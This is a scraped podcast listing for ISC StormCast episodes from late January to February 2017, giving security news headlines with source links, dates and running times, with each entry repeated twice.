Google Chrome TLS 1.3 Update Causes Issues With Bluecoat https://bugs.chromium.org/p/chromium/issues/detail?id=694593 Windows 10 Will Implmenet "Gatekeeper" Like Technology https://twitter.com/vitorgrs/status/835674417602637824 Google Releases E2EMail Chrome Plugin https://security.googleblog.com/2017/02/e2email-research-project-has-left-nest_24.html Decrypting SCOM "RunAs" Credentials https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/february/scomplicated-decrypting-scom-runas-credentials/
2/28/20175 minutes, 55 seconds
Episode Artwork

ISC StormCast for Tuesday, February 28th 2017

Google Chrome TLS 1.3 Update Causes Issues With Bluecoat https://bugs.chromium.org/p/chromium/issues/detail?id=694593 Windows 10 Will Implmenet "Gatekeeper" Like Technology https://twitter.com/vitorgrs/status/835674417602637824 Google Releases E2EMail Chrome Plugin https://security.googleblog.com/2017/02/e2email-research-project-has-left-nest_24.html Decrypting SCOM "RunAs" Credentials https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/february/scomplicated-decrypting-scom-runas-credentials/
2/28/20175 minutes, 55 seconds
Episode Artwork

ISC StormCast for Monday, February 27th 2017

Cloudflare Leaks Data https://blog.cloudflare.com/incident-report-on-memory-leak-caused-by-cloudflare-parser-bug/ IE/Edge Denial of Service https://bugs.chromium.org/p/project-zero/issues/detail?id=1011#c2 "Dynamite Phishing" https://isc.sans.edu/forums/diary/Dynamite+Phishing/22121/ Google Credentials Problems https://productforums.google.com/forum/#!category-topic/gmail/LOt2x1_c3KM
2/27/20175 minutes, 17 seconds
Episode Artwork

ISC StormCast for Monday, February 27th 2017

Cloudflare Leaks Data https://blog.cloudflare.com/incident-report-on-memory-leak-caused-by-cloudflare-parser-bug/ IE/Edge Denial of Service https://bugs.chromium.org/p/project-zero/issues/detail?id=1011#c2 "Dynamite Phishing" https://isc.sans.edu/forums/diary/Dynamite+Phishing/22121/ Google Credentials Problems https://productforums.google.com/forum/#!category-topic/gmail/LOt2x1_c3KM
2/27/20175 minutes, 17 seconds
Episode Artwork

ISC StormCast for Friday, February 24th 2017

Researchers Find SHA1 Collision https://shattered.io/static/shattered.pdf Arrest Made in Deutsche Telekom DSL Modem Attack https://www.bleepingcomputer.com/news/security/uk-police-arrest-suspect-behind-mirai-malware-attacks-on-deutsche-telekom/
2/24/20175 minutes, 32 seconds
Episode Artwork

ISC StormCast for Friday, February 24th 2017

Researchers Find SHA1 Collision https://shattered.io/static/shattered.pdf Arrest Made in Deutsche Telekom DSL Modem Attack https://www.bleepingcomputer.com/news/security/uk-police-arrest-suspect-behind-mirai-malware-attacks-on-deutsche-telekom/
2/24/20175 minutes, 32 seconds
Episode Artwork

ISC StormCast for Thursday, February 23rd 2017

User Centric Mobile Device Security With Stethoscope http://techblog.netflix.com/2017/02/introducing-netflix-stethoscope.html Fingerprinting Firefox With Intermediate Certificates https://shiftordie.de/blog/2017/02/21/fingerprinting-firefox-users-with-cached-intermediate-ca-certificates-fiprinca/ JudasDNS Attack DNS Proxy https://github.com/mandatoryprogrammer/JudasDNS
2/23/20175 minutes, 23 seconds
Episode Artwork

ISC StormCast for Thursday, February 23rd 2017

User Centric Mobile Device Security With Stethoscope http://techblog.netflix.com/2017/02/introducing-netflix-stethoscope.html Fingerprinting Firefox With Intermediate Certificates https://shiftordie.de/blog/2017/02/21/fingerprinting-firefox-users-with-cached-intermediate-ca-certificates-fiprinca/ JudasDNS Attack DNS Proxy https://github.com/mandatoryprogrammer/JudasDNS
2/23/20175 minutes, 23 seconds
Episode Artwork

ISC StormCast for Wednesday, February 22nd 2017

Microsoft Releases Flash Patch From Skipped February Update https://technet.microsoft.com/en-us/library/security/MS17-005 Investigating Off-Premise Wireless Behaviour https://isc.sans.edu/forums/diary/Investigating+OffPremise+Wireless+Behaviour+or+I+Know+What+You+Connected+To/22089/ "Bugdrop" Steals Large Amount of Audio https://cyberx-labs.com/en/blog/operation-bugdrop-cyberx-discovers-large-scale-cyber-reconnaissance-operation/
2/22/20175 minutes, 2 seconds
Episode Artwork

ISC StormCast for Wednesday, February 22nd 2017

Microsoft Releases Flash Patch From Skipped February Update https://technet.microsoft.com/en-us/library/security/MS17-005 Investigating Off-Premise Wireless Behaviour https://isc.sans.edu/forums/diary/Investigating+OffPremise+Wireless+Behaviour+or+I+Know+What+You+Connected+To/22089/ "Bugdrop" Steals Large Amount of Audio https://cyberx-labs.com/en/blog/operation-bugdrop-cyberx-discovers-large-scale-cyber-reconnaissance-operation/
2/22/20175 minutes, 2 seconds
Episode Artwork

ISC StormCast for Tuesday, February 21st 2017

Hardening Postfix Against FTP Relay Attacks https://isc.sans.edu/forums/diary/Hardening+Postfix+Against+FTP+Relay+Attacks/22086/ Kaspersky Examins Mobile Car Apps https://securelist.com/analysis/publications/77576/mobile-apps-and-stealing-a-connected-car/ Cars "Remember" Prior Owners http://money.cnn.com/2017/02/17/technology/used-car-hack-safety-location/ Xen Project Reconsidering Vulnerability Disclosure Policy https://blog.xenproject.org/2017/02/14/request-for-comment-scope-of-vulnerabilities-for-which-xsas-are-issued/ Stagefright Vulnerability had minimal affect on Android Security https://www.rsaconference.com/speakers/adrian_ludwig
2/21/20175 minutes, 55 seconds
Episode Artwork

ISC StormCast for Tuesday, February 21st 2017

Hardening Postfix Against FTP Relay Attacks https://isc.sans.edu/forums/diary/Hardening+Postfix+Against+FTP+Relay+Attacks/22086/ Kaspersky Examins Mobile Car Apps https://securelist.com/analysis/publications/77576/mobile-apps-and-stealing-a-connected-car/ Cars "Remember" Prior Owners http://money.cnn.com/2017/02/17/technology/used-car-hack-safety-location/ Xen Project Reconsidering Vulnerability Disclosure Policy https://blog.xenproject.org/2017/02/14/request-for-comment-scope-of-vulnerabilities-for-which-xsas-are-issued/ Stagefright Vulnerability had minimal affect on Android Security https://www.rsaconference.com/speakers/adrian_ludwig
2/21/20175 minutes, 55 seconds
Episode Artwork

ISC StormCast for Monday, February 20th 2017

RTRBK: Router, Switch, Firewall Backups in Powershell https://isc.sans.edu/forums/diary/RTRBK+Router+Switch+Firewall+Backups+in+PowerShell+tool+drop/22079/ Windows EMF Imge 0-Day Memory Leak https://bugs.chromium.org/p/project-zero/issues/detail?id=992 Brazillian Traffic Ticket Malspam https://isc.sans.edu/forums/diary/Brazilian+malspam+sends+Autoitbased+malware/22081/ Using XXE To Send E-Mail https://shiftordie.de/blog/2017/02/18/smtp-over-xxe/
2/20/20175 minutes, 27 seconds
Episode Artwork

ISC StormCast for Monday, February 20th 2017

RTRBK: Router, Switch, Firewall Backups in Powershell https://isc.sans.edu/forums/diary/RTRBK+Router+Switch+Firewall+Backups+in+PowerShell+tool+drop/22079/ Windows EMF Imge 0-Day Memory Leak https://bugs.chromium.org/p/project-zero/issues/detail?id=992 Brazillian Traffic Ticket Malspam https://isc.sans.edu/forums/diary/Brazilian+malspam+sends+Autoitbased+malware/22081/ Using XXE To Send E-Mail https://shiftordie.de/blog/2017/02/18/smtp-over-xxe/
2/20/20175 minutes, 27 seconds
Episode Artwork

ISC StormCast for Friday, February 17th 2017

AVM Private Key Leak Puts Cable Modems At Risk https://isc.sans.edu/forums/diary/AVM+Private+Key+Leak+Puts+Cable+Modems+Worldwide+At+Risk/22076/ OpenSSL Update https://isc.sans.edu/forums/diary/OpenSSL+110e+Update+No+need+to+panic+openssl/22074/ Microsoft Update Delayed https://blogs.technet.microsoft.com/msrc/2017/02/14/february-2017-security-update-release/ ANC Attack ASLR Bypass https://www.vusec.net/projects/anc/
2/17/20177 minutes, 9 seconds
Episode Artwork

ISC StormCast for Friday, February 17th 2017

AVM Private Key Leak Puts Cable Modems At Risk https://isc.sans.edu/forums/diary/AVM+Private+Key+Leak+Puts+Cable+Modems+Worldwide+At+Risk/22076/ OpenSSL Update https://isc.sans.edu/forums/diary/OpenSSL+110e+Update+No+need+to+panic+openssl/22074/ Microsoft Update Delayed https://blogs.technet.microsoft.com/msrc/2017/02/14/february-2017-security-update-release/ ANC Attack ASLR Bypass https://www.vusec.net/projects/anc/
2/17/20177 minutes, 9 seconds
Episode Artwork

ISC StormCast for Thursday, February 16th 2017

How Was Your Stay At The Hotel La Playa https://isc.sans.edu/forums/diary/How+was+your+stay+at+the+Hotel+La+Playa/22069 XAgent OS X Malware https://labs.bitdefender.com/2017/02/new-xagent-mac-malware-linked-with-the-apt28/ Conference Phone Compromise https://www.contextis.com//resources/blog/phwning-boardroom-hacking-android-conference-phone/
2/16/20175 minutes, 28 seconds
Episode Artwork

ISC StormCast for Thursday, February 16th 2017

How Was Your Stay At The Hotel La Playa https://isc.sans.edu/forums/diary/How+was+your+stay+at+the+Hotel+La+Playa/22069 XAgent OS X Malware https://labs.bitdefender.com/2017/02/new-xagent-mac-malware-linked-with-the-apt28/ Conference Phone Compromise https://www.contextis.com//resources/blog/phwning-boardroom-hacking-android-conference-phone/
2/16/20175 minutes, 28 seconds
Episode Artwork

ISC StormCast for Wednesday, February 15th 2017

Microsoft Cancels Patch Tuesday https://blogs.technet.microsoft.com/msrc/2017/02/14/february-2017-security-update-release/ Adobe Update For Flash https://helpx.adobe.com/security/products/flash-player/apsb17-04.html WebSephere Update http://www-01.ibm.com/support/docview.wss?uid=swg21997743 Operation Kingphish https://medium.com/amnesty-insights/operation-kingphish-uncovering-a-campaign-of-cyber-attacks-against-civil-society-in-qatar-and-aa40c9e08852#.965et86vk Hacking Node-Serialize http://blog.websecurify.com/2017/02/hacking-node-serialize.html
2/15/20175 minutes, 46 seconds
Episode Artwork

ISC StormCast for Wednesday, February 15th 2017

Microsoft Cancels Patch Tuesday https://blogs.technet.microsoft.com/msrc/2017/02/14/february-2017-security-update-release/ Adobe Update For Flash https://helpx.adobe.com/security/products/flash-player/apsb17-04.html WebSephere Update http://www-01.ibm.com/support/docview.wss?uid=swg21997743 Operation Kingphish https://medium.com/amnesty-insights/operation-kingphish-uncovering-a-campaign-of-cyber-attacks-against-civil-society-in-qatar-and-aa40c9e08852#.965et86vk Hacking Node-Serialize http://blog.websecurify.com/2017/02/hacking-node-serialize.html
2/15/20175 minutes, 46 seconds
Episode Artwork

ISC StormCast for Tuesday, February 14th 2017

New Tool: Packettotal.com http://www.packettotal.com What Not To Decrypt When Intercepting SSL https://isc.sans.edu/forums/diary/Stuff+I+Learned+Decrypting/22059/ webcast: https://www.sans.org/webcasts/8-ways-watch-invisible-analyzing-encrypted-network-traffic-103277 Simple Static Malware Analyzer https://github.com/secrary/SSMA Critical Firefox for Android Vulnerability https://www.mozilla.org/en-US/security/advisories/mfsa2017-04/ Ubuntu ntfs-3g Privilege Escalation https://bugs.chromium.org/p/project-zero/issues/detail?id=1072 Microsoft Patch Tuesday Changes http://www.infoworld.com/article/3139922/microsoft-windows/microsoft-to-revamp-its-documentation-for-security-patches.html
2/14/20175 minutes, 28 seconds
Episode Artwork

ISC StormCast for Tuesday, February 14th 2017

New Tool: Packettotal.com http://www.packettotal.com What Not To Decrypt When Intercepting SSL https://isc.sans.edu/forums/diary/Stuff+I+Learned+Decrypting/22059/ webcast: https://www.sans.org/webcasts/8-ways-watch-invisible-analyzing-encrypted-network-traffic-103277 Simple Static Malware Analyzer https://github.com/secrary/SSMA Critical Firefox for Android Vulnerability https://www.mozilla.org/en-US/security/advisories/mfsa2017-04/ Ubuntu ntfs-3g Privilege Escalation https://bugs.chromium.org/p/project-zero/issues/detail?id=1072 Microsoft Patch Tuesday Changes http://www.infoworld.com/article/3139922/microsoft-windows/microsoft-to-revamp-its-documentation-for-security-patches.html
2/14/20175 minutes, 28 seconds
Episode Artwork

ISC StormCast for Monday, February 13th 2017

Vulnerabilities in Samsung KNOX https://googleprojectzero.blogspot.de/2017/02/lifting-hyper-visor-bypassing-samsungs.html Auditing MongoDB Configurations https://github.com/stampery/mongoaudit Reversing Javascript https://isc.sans.edu/forums/diary/Analysis+of+a+Suspicious+Piece+of+JavaScript/22056/ Wordpress REST API Flaw Widely Exploited https://www.wordfence.com/blog/2017/02/rapid-growth-in-rest-api-defacements/ Cryptographically Secure PHP Development https://paragonie.com/blog/2017/02/cryptographically-secure-php-development DEV522 Web Application Security Essentials https://www.sans.org/event/sans-2017/course/defending-web-applications-security-essentials
2/13/20175 minutes, 57 seconds
Episode Artwork

ISC StormCast for Monday, February 13th 2017

Vulnerabilities in Samsung KNOX https://googleprojectzero.blogspot.de/2017/02/lifting-hyper-visor-bypassing-samsungs.html Auditing MongoDB Configurations https://github.com/stampery/mongoaudit Reversing Javascript https://isc.sans.edu/forums/diary/Analysis+of+a+Suspicious+Piece+of+JavaScript/22056/ Wordpress REST API Flaw Widely Exploited https://www.wordfence.com/blog/2017/02/rapid-growth-in-rest-api-defacements/ Cryptographically Secure PHP Development https://paragonie.com/blog/2017/02/cryptographically-secure-php-development DEV522 Web Application Security Essentials https://www.sans.org/event/sans-2017/course/defending-web-applications-security-essentials
2/13/20175 minutes, 57 seconds
Episode Artwork

ISC StormCast for Friday, February 10th 2017

F5 Big IP Ticketbleed Vulnerability https://filippo.io/Ticketbleed/ CryptoShield Ransomware from Rig EK https://isc.sans.edu/forums/diary/CryptoShield+Ransomware+from+Rig+EK/22047/ Hancitor/Pony Malspam https://isc.sans.edu/forums/diary/HancitorPony+malspam/22053/ Apple Retaining Old Browser History Data https://blog.elcomsoft.com/2017/02/elcomsoft-extracts-deleted-safari-browsing-history-from-icloud/#more-3769 Brute Forcing LUKS Passwords https://0x00sec.org/t/breaking-encryption-hashed-passwords-luks-devices/811
2/10/20176 minutes, 15 seconds
Episode Artwork

ISC StormCast for Friday, February 10th 2017

F5 Big IP Ticketbleed Vulnerability https://filippo.io/Ticketbleed/ CryptoShield Ransomware from Rig EK https://isc.sans.edu/forums/diary/CryptoShield+Ransomware+from+Rig+EK/22047/ Hancitor/Pony Malspam https://isc.sans.edu/forums/diary/HancitorPony+malspam/22053/ Apple Retaining Old Browser History Data https://blog.elcomsoft.com/2017/02/elcomsoft-extracts-deleted-safari-browsing-history-from-icloud/#more-3769 Brute Forcing LUKS Passwords https://0x00sec.org/t/breaking-encryption-hashed-passwords-luks-devices/811
2/10/20176 minutes, 15 seconds
Episode Artwork

ISC StormCast for Thursday, February 9th 2017

Cloud Metadata URLs https://isc.sans.edu/forums/diary/Cloud+Metadata+Urls/22046/ Intel Atom C2000 Chip Failures http://www.theregister.co.uk/2017/02/06/cisco_intel_decline_to_link_product_warning_to_faulty_chip/ More W-2 Scams, Now Combined With Wire Transfer Scams https://nakedsecurity.sophos.com/2017/02/08/beware-the-latest-tax-season-spear-phishing-scam/ Macro Malware Coming to MacOS https://objective-see.com/blog/blog_0x17.html
2/9/20176 minutes, 26 seconds
Episode Artwork

ISC StormCast for Thursday, February 9th 2017

Cloud Metadata URLs https://isc.sans.edu/forums/diary/Cloud+Metadata+Urls/22046/ Intel Atom C2000 Chip Failures http://www.theregister.co.uk/2017/02/06/cisco_intel_decline_to_link_product_warning_to_faulty_chip/ More W-2 Scams, Now Combined With Wire Transfer Scams https://nakedsecurity.sophos.com/2017/02/08/beware-the-latest-tax-season-spear-phishing-scam/ Macro Malware Coming to MacOS https://objective-see.com/blog/blog_0x17.html
2/9/20176 minutes, 26 seconds
Episode Artwork

ISC StormCast for Wednesday, February 8th 2017

Using Emojis as Passwords https://isc.sans.edu/forums/diary/My+Password+is+taco+Using+Emojis+for+Stronger+Passwords/22042/ Popular iOS Applications Not Using TLS https://medium.com/@chronic_9612/76-popular-apps-confirmed-vulnerable-to-silent-interception-of-tls-protected-data-2c9a2409dd1#.nv0mf6w4e Web Bluetooth Security Model https://medium.com/@jyasskin/the-web-bluetooth-security-model-666b4e7eed2#.kqtxdk70h E-Mail Spoofing in GMail https://www.linkedin.com/pulse/aware-sender-spoofing-amongst-gmail-users-renato-marinho
2/8/20177 minutes, 5 seconds
Episode Artwork

ISC StormCast for Wednesday, February 8th 2017

Using Emojis as Passwords https://isc.sans.edu/forums/diary/My+Password+is+taco+Using+Emojis+for+Stronger+Passwords/22042/ Popular iOS Applications Not Using TLS https://medium.com/@chronic_9612/76-popular-apps-confirmed-vulnerable-to-silent-interception-of-tls-protected-data-2c9a2409dd1#.nv0mf6w4e Web Bluetooth Security Model https://medium.com/@jyasskin/the-web-bluetooth-security-model-666b4e7eed2#.kqtxdk70h E-Mail Spoofing in GMail https://www.linkedin.com/pulse/aware-sender-spoofing-amongst-gmail-users-renato-marinho
2/8/20177 minutes, 5 seconds
Episode Artwork

ISC StormCast for Tuesday, February 7th 2017

Malicous or Not? Help Me Decide https://isc.sans.edu/forums/diary/Malicious+Or+Not+You+decide/22040/ OpenBSD Http Server DoS Vulnerability https://pierrekim.github.io/blog/2017-02-07-openbsd-httpd-CVE-2017-5850.html Bypassing Tor Browser Via Windows DRM https://www.myhackerhouse.com/windows_drm_vs_torbrowser/ Freedom Hosting II Compromise https://www.scmagazineuk.com/major-dark-web-host-hacked-381000-sets-of-user-details-leaked-online/article/636259/
2/7/20175 minutes, 51 seconds
Episode Artwork

ISC StormCast for Tuesday, February 7th 2017

Malicous or Not? Help Me Decide https://isc.sans.edu/forums/diary/Malicious+Or+Not+You+decide/22040/ OpenBSD Http Server DoS Vulnerability https://pierrekim.github.io/blog/2017-02-07-openbsd-httpd-CVE-2017-5850.html Bypassing Tor Browser Via Windows DRM https://www.myhackerhouse.com/windows_drm_vs_torbrowser/ Freedom Hosting II Compromise https://www.scmagazineuk.com/major-dark-web-host-hacked-381000-sets-of-user-details-leaked-online/article/636259/
2/7/20175 minutes, 51 seconds
Episode Artwork

ISC StormCast for Monday, February 6th 2017

Base64 Encoded Malware Samples on Pastebin https://isc.sans.edu/forums/diary/Many+Malware+Samples+Found+on+Pastebin/22036/ Cisco Recaling Meraki Access Points over Fatal Hardware Flaw http://www.cisco.com/c/en/us/support/web/clock-signal.html SQL Injection Vulnerability in McAfee e Policy Orchastrator https://kc.mcafee.com/corporate/index?page=content&id=SB10187 Update from Microsoft on SMB 3 Vulnerability https://threatpost.com/microsoft-waits-for-patch-tuesday-to-fix-smb-zero-day/123541/ Malicious Files Sent via Whatsapp to Target Indian Military http://economictimes.indiatimes.com/news/defence/defence-security-forces-alerted-against-whatsapp-virus/articleshow/56258702.cms
2/6/20175 minutes, 28 seconds
Episode Artwork

ISC StormCast for Monday, February 6th 2017

Base64 Encoded Malware Samples on Pastebin https://isc.sans.edu/forums/diary/Many+Malware+Samples+Found+on+Pastebin/22036/ Cisco Recaling Meraki Access Points over Fatal Hardware Flaw http://www.cisco.com/c/en/us/support/web/clock-signal.html SQL Injection Vulnerability in McAfee e Policy Orchastrator https://kc.mcafee.com/corporate/index?page=content&id=SB10187 Update from Microsoft on SMB 3 Vulnerability https://threatpost.com/microsoft-waits-for-patch-tuesday-to-fix-smb-zero-day/123541/ Malicious Files Sent via Whatsapp to Target Indian Military http://economictimes.indiatimes.com/news/defence/defence-security-forces-alerted-against-whatsapp-virus/articleshow/56258702.cms
2/6/20175 minutes, 28 seconds
Episode Artwork

ISC StormCast for Friday, February 3rd 2017

SMB 3 0-Day DoS Exploit https://isc.sans.edu/forums/diary/Windows+SMBv3+Denial+of+Service+Proof+of+Concept+0+Day+Exploit/22029/ WordPress Update Silently Fixes Security Flaw https://make.wordpress.org/core/2017/02/01/disclosure-of-additional-security-fix-in-wordpress-4-7-2/ Webroot Update Patches BSOD Flaw https://community.webroot.com/t5/Product-Questions/BSOD-0x50-PAGE-FAULT-IN-NONPAGED-AREA/td-p/284302?sf54120672=1&sf54123115=1 Google Adds Support for Mandatory Two-Factor Authentication to G-Suite https://security.googleblog.com/2017/02/better-and-more-usable-protection-from.html Cisco Prime Home Vulnerablity https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170201-prime-home
2/3/20175 minutes, 27 seconds
Episode Artwork

ISC StormCast for Friday, February 3rd 2017

SMB 3 0-Day DoS Exploit https://isc.sans.edu/forums/diary/Windows+SMBv3+Denial+of+Service+Proof+of+Concept+0+Day+Exploit/22029/ WordPress Update Silently Fixes Security Flaw https://make.wordpress.org/core/2017/02/01/disclosure-of-additional-security-fix-in-wordpress-4-7-2/ Webroot Update Patches BSOD Flaw https://community.webroot.com/t5/Product-Questions/BSOD-0x50-PAGE-FAULT-IN-NONPAGED-AREA/td-p/284302?sf54120672=1&sf54123115=1 Google Adds Support for Mandatory Two-Factor Authentication to G-Suite https://security.googleblog.com/2017/02/better-and-more-usable-protection-from.html Cisco Prime Home Vulnerablity https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170201-prime-home
2/3/20175 minutes, 27 seconds
Episode Artwork

ISC StormCast for Thursday, February 2nd 2017

Multiple Vulnerabilites in tcpdump https://isc.sans.edu/forums/diary/Multiple+Vulnerabilities+in+tcpdump/22017/ Quick Analysis of Data Left Available by Attackers https://isc.sans.edu/forums/diary/Quick+Analysis+of+Data+Left+Available+by+Attackers/22015/ Securing The Human Ouch! Newsletter https://securingthehuman.sans.org/ouch/ Redis CSRF Vulnerability Exploit https://github.com/dxa4481/whatsinmyredis
2/2/20174 minutes, 59 seconds
Episode Artwork

ISC StormCast for Thursday, February 2nd 2017

Multiple Vulnerabilites in tcpdump https://isc.sans.edu/forums/diary/Multiple+Vulnerabilities+in+tcpdump/22017/ Quick Analysis of Data Left Available by Attackers https://isc.sans.edu/forums/diary/Quick+Analysis+of+Data+Left+Available+by+Attackers/22015/ Securing The Human Ouch! Newsletter https://securingthehuman.sans.org/ouch/ Redis CSRF Vulnerability Exploit https://github.com/dxa4481/whatsinmyredis
2/2/20174 minutes, 59 seconds
Episode Artwork

ISC StormCast for Wednesday, February 1st 2017

Fileless UAC Bypass Used to Drop Keybase Malware https://isc.sans.edu/forums/diary/Malicious+Office+files+using+fileless+UAC+bypass+to+drop+KEYBASE+malware/22011/ Apple Removes Activation Lock Test Tool After Abuse https://www.macrumors.com/2017/01/30/activation-lock-website-used-in-hack/ Multiple Vulnerabilities in tcpdump https://www.debian.org/security/2017/dsa-3775 Postscript Printer Vulnerabilities http://seclists.org/fulldisclosure/2017/Jan/89 Stop Disabling SELinux https://learntemail.sam.today/blog/stop-disabling-selinux:-a-real-world-guide/
2/1/20175 minutes, 36 seconds
Episode Artwork

ISC StormCast for Wednesday, February 1st 2017

Fileless UAC Bypass Used to Drop Keybase Malware https://isc.sans.edu/forums/diary/Malicious+Office+files+using+fileless+UAC+bypass+to+drop+KEYBASE+malware/22011/ Apple Removes Activation Lock Test Tool After Abuse https://www.macrumors.com/2017/01/30/activation-lock-website-used-in-hack/ Multiple Vulnerabilities in tcpdump https://www.debian.org/security/2017/dsa-3775 Postscript Printer Vulnerabilities http://seclists.org/fulldisclosure/2017/Jan/89 Stop Disabling SELinux https://learntemail.sam.today/blog/stop-disabling-selinux:-a-real-world-guide/
2/1/20175 minutes, 36 seconds
Episode Artwork

ISC StormCast for Tuesday, January 31st 2017

py2exe Decompiling Part 2 https://isc.sans.edu/forums/diary/py2exe+Decompiling+Part+2/22005/ Telemarketer Leaks Call Recordings https://mackeeper.com/blog/post/326-telemarketing-company-leaks-400k-of-sensitive-files Facebook Introduces Delegated Recovery Protocol https://github.com/facebookincubator/DelegatedRecovery/ https://raw.githubusercontent.com/facebookincubator/DelegatedRecovery/master/draft-hill-delegated-recovery.raw.txt Another Cisco WebEx Update https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170124-webex Cryptkeeper Does Not Correctly Encrypt Folders https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=852751
1/31/20176 minutes, 36 seconds
Episode Artwork

ISC StormCast for Tuesday, January 31st 2017

py2exe Decompiling Part 2 https://isc.sans.edu/forums/diary/py2exe+Decompiling+Part+2/22005/ Telemarketer Leaks Call Recordings https://mackeeper.com/blog/post/326-telemarketing-company-leaks-400k-of-sensitive-files Facebook Introduces Delegated Recovery Protocol https://github.com/facebookincubator/DelegatedRecovery/ https://raw.githubusercontent.com/facebookincubator/DelegatedRecovery/master/draft-hill-delegated-recovery.raw.txt Another Cisco WebEx Update https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170124-webex Cryptkeeper Does Not Correctly Encrypt Folders https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=852751
1/31/20176 minutes, 36 seconds
Episode Artwork

ISC StormCast for Monday, January 30th 2017

Port 5358 Scans for Devices https://isc.sans.edu/forums/diary/Request+for+Packets+and+Logs+TCP+5358/21997/ OpenSSH Vulnerablity http://www.openwall.com/lists/oss-security/2017/01/26/2 Ransomware Hits Traffic Cameras in DC https://www.washingtonpost.com/local/public-safety/hackers-hit-dc-police-closed-circuit-camera-network-city-officials-disclose/2017/01/27/d285a4a4-e4f5-11e6-ba11-63c4b4fb5a63_print.html Hotel Hit By Ransomware http://www.thelocal.at/20170128/hotel-ransomed-by-hackers-as-guests-locked-in-rooms Not So Private Android VPNs http://www.icir.org/vern/papers/vpn-apps-imc16.pdf Google Starting its own Certificate Authority https://security.googleblog.com/2017/01/the-foundation-of-more-secure-web.html
1/30/20176 minutes, 41 seconds
Episode Artwork

ISC StormCast for Monday, January 30th 2017

Port 5358 Scans for Devices https://isc.sans.edu/forums/diary/Request+for+Packets+and+Logs+TCP+5358/21997/ OpenSSH Vulnerablity http://www.openwall.com/lists/oss-security/2017/01/26/2 Ransomware Hits Traffic Cameras in DC https://www.washingtonpost.com/local/public-safety/hackers-hit-dc-police-closed-circuit-camera-network-city-officials-disclose/2017/01/27/d285a4a4-e4f5-11e6-ba11-63c4b4fb5a63_print.html Hotel Hit By Ransomware http://www.thelocal.at/20170128/hotel-ransomed-by-hackers-as-guests-locked-in-rooms Not So Private Android VPNs http://www.icir.org/vern/papers/vpn-apps-imc16.pdf Google Starting its own Certificate Authority https://security.googleblog.com/2017/01/the-foundation-of-more-secure-web.html
1/30/20176 minutes, 41 seconds
Episode Artwork

ISC StormCast for Friday, January 27th 2017

IOCs: Risks of False Positive Floods https://isc.sans.edu/forums/diary/IOCs+Risks+of+False+Positive+Alerts+Flood+Ahead/21977/ Android Ransomware in Google Play Store http://blog.checkpoint.com/2017/01/24/charger-malware/ OpenSSL Update https://www.openssl.org/news/vulnerabilities.html#y2017 Facebook To Implement U2F (FIDO) Login https://www.facebook.com/notes/facebook-security/security-key-for-safer-logins-with-a-touch/10154125089265766 WebEx Update https://bugs.chromium.org/p/project-zero/issues/detail?id=1100
1/27/20175 minutes, 35 seconds
Episode Artwork

ISC StormCast for Friday, January 27th 2017

IOCs: Risks of False Positive Floods https://isc.sans.edu/forums/diary/IOCs+Risks+of+False+Positive+Alerts+Flood+Ahead/21977/ Android Ransomware in Google Play Store http://blog.checkpoint.com/2017/01/24/charger-malware/ OpenSSL Update https://www.openssl.org/news/vulnerabilities.html#y2017 Facebook To Implement U2F (FIDO) Login https://www.facebook.com/notes/facebook-security/security-key-for-safer-logins-with-a-touch/10154125089265766 WebEx Update https://bugs.chromium.org/p/project-zero/issues/detail?id=1100
1/27/20175 minutes, 35 seconds
Episode Artwork

ISC StormCast for Thursday, January 26th 2017

Cisco WebEx Remains Vulnerable. Other Browsers Affected https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170124-webex Malicious SVG Files Fund in the Wild https://isc.sans.edu/forums/diary/Malicious+SVG+Files+in+the+Wild/21971/ W2 Scams Hitting Again http://www.nbcdfw.com/news/local/Argyle-ISD-Employees-Hit-with-Data-Breach-411337825.html XXE Entity Vulnerability in Uber https://httpsonly.blogspot.co.ke/2017/01/0day-writeup-xxe-in-ubercom.html?m=1 Firefox 51 Released https://blog.mozilla.org/security/2017/01/20/communicating-the-dangers-of-non-secure-http/
1/26/20175 minutes, 49 seconds
Episode Artwork

ISC StormCast for Thursday, January 26th 2017

Cisco WebEx Remains Vulnerable. Other Browsers Affected https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170124-webex Malicious SVG Files Fund in the Wild https://isc.sans.edu/forums/diary/Malicious+SVG+Files+in+the+Wild/21971/ W2 Scams Hitting Again http://www.nbcdfw.com/news/local/Argyle-ISD-Employees-Hit-with-Data-Breach-411337825.html XXE Entity Vulnerability in Uber https://httpsonly.blogspot.co.ke/2017/01/0day-writeup-xxe-in-ubercom.html?m=1 Firefox 51 Released https://blog.mozilla.org/security/2017/01/20/communicating-the-dangers-of-non-secure-http/
1/26/20175 minutes, 49 seconds
Episode Artwork

ISC StormCast for Wednesday, January 25th 2017

Cisco Releases Patch for Chrome Webex Plugin https://continuum.cisco.com/2017/01/23/its-a-good-idea-to-patch-your-webex-chrome-extension-now/ Companies Fall For Fake Ransomware https://www.citrix.com/blogs/2017/01/24/bluff-ransomware-attacks-bamboozle-british-businesses/ systemd priviledge escalation vulnerablity http://www.openwall.com/lists/oss-security/2017/01/24/4 nginx update released http://nginx.org/en/CHANGES
1/25/20175 minutes, 26 seconds
Episode Artwork

ISC StormCast for Wednesday, January 25th 2017

Cisco Releases Patch for Chrome Webex Plugin https://continuum.cisco.com/2017/01/23/its-a-good-idea-to-patch-your-webex-chrome-extension-now/ Companies Fall For Fake Ransomware https://www.citrix.com/blogs/2017/01/24/bluff-ransomware-attacks-bamboozle-british-businesses/ systemd priviledge escalation vulnerablity http://www.openwall.com/lists/oss-security/2017/01/24/4 nginx update released http://nginx.org/en/CHANGES
1/25/20175 minutes, 26 seconds
Episode Artwork

ISC StormCast for Tuesday, January 24th 2017

